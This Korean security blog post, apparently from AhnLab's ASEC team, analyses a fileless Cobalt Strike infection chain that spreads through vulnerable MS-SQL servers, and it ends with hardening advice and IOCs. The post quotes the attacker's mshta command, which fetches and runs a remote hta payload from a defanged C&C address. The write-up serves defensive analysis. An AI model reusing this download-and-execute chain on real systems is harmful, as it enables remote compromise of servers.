취약한 MS-SQL 서버를 대상으로 유포 중인 코발트 스트라이크 (2)

지난 2월 14일 ASEC 분석팀은 취약한 MS-SQL 서버를 통해 코발트 스트라이크가 유포됨을 공유하였다.

이번 사례는 당시 유포 방식과 다른 프로세스 트리 구조를 갖는 형태의 코발트 스트라이크를 유포하는 정황을 확인하였다. 확인된 유포 방식은 MS-SQL 서버 관련 프로세스인 sqlservr.exe가 취약점에 의해 cmd.exe를 실행하는 것 까지는 동일하나, 이후 mshta.exe와 rundll32.exe를 이용하여 메모리 상에서 파일리스 형태로 코발트 스트라이크를 실행하는 점이 다르다.

[그림 1] 코발트 스트라이크실행 트리구조

공격자는 MS-SQL 취약점에 의해 실행된 cmd.exe를 통해 mshta.exe 프로세스를 실행하였다. mshta.exe는 정상 윈도우 유틸리티로써 Java 스크립트, Visual Basic 스크립트 실행 및 URL을 직접 전달하여 hta 파일을 실행하는 기능을 수행한다. 이번 사례의 경우 URL을 아래와 같이 mshta 프로세스의 인자값으로 전달하여 공격자 서버에서 악성 hta 파일을 다운로드받아 실행하였다.

  • mshta.exe http[:]//114.132.246[.]102:1222/bobo.png
[그림 2] bobo.png(hta 파일)

다운로드된 hta는 코발트 스트라이크 페이로드(Stasger)가 포함된 xsl 스크립트를 공격자 서버에서 다운로드 받아 실행하는 기능을 수행한다.

[그림 3] bobo.xsl 스크립트 코드 일부

해당 xsl 스크립트가 실행되면 rundll32.exe에 코발트 스트라이크 (Stager)를 인젝션하여 실행한다. 이후 C&C 서버로 부터 비컨이 다운로드되어 다양한 원격 제어 명령을 수행할 수 있게된다.

[그림 4] 코발트 스트라이크 설정 파일

MS-SQL 서버의 관리자들은 계정의 비밀번호를 추측하기 어려운 형태로 사용하고 주기적으로 변경하여 무차별 대입 공격과 사전 공격으로부터 데이터베이스 서버를 보호해야 하며, 최신 버전으로 패치하여 취약점 공격을 방지해야 한다. 또한 외부에 오픈되어 접근 가능한 데이터베이스 서버에 대해 방화벽과 같은 보안 제품을 이용해 외부 공격자로부터의 접근을 통제해야 한다. 위와 같은 조치가 선행되지 않을 경우 공격자 및 악성코드들에 의해 계속적인 감염이 이루어질 수 있다.

안랩 V3 제품에서는 해당 유형에 대해 다음과 같이 진단하고 있다.

[IOC]
[hta 스크립트]
(MD5, 진단명, 엔진버전)
– 591ec011ec21d1a3a05863e72910c55f (Downloader/JS.Agent) 2022.02.16.00

[xsl 스크립트]
(MD5, 진단명, 엔진버전)
– dab62efb57014b0508fa1a8ff10b736a (Trojan/JS.Scriptinject.S1252) 2020.07.11.00

[C&C 서버]
– 114.132.246[.]102
– hxxp://114.132.246[.]102:1222/bobo.png
– hxxp://114.132.246[.]102:1222/bobo.xsl

0 0 votes
별점 주기
guest
3 댓글
Inline Feedbacks
View all comments
trackback

[…] – [ASEC 블로그] 취약한 MS-SQL 서버를 대상으로 유포 중인 Remcos RAT– [ASEC 블로그] 취약한 MS-SQL 서버를 대상으로 유포 중인 코발트 스트라이크– [ASEC 블로그] 취약한 MS-SQL 서버를 대상으로 유포 중인 코발트 스트라이크 (2) […]

trackback

[…] MS-SQL 서버를 대상으로 유포 중인 코발트 스트라이크– [ASEC 블로그] 취약한 MS-SQL 서버를 대상으로 유포 중인 코발트 스트라이크 (2)– [ASEC 블로그] 취약한 MS-SQL 서버를 대상으로 유포 중인 코인 마이너– […]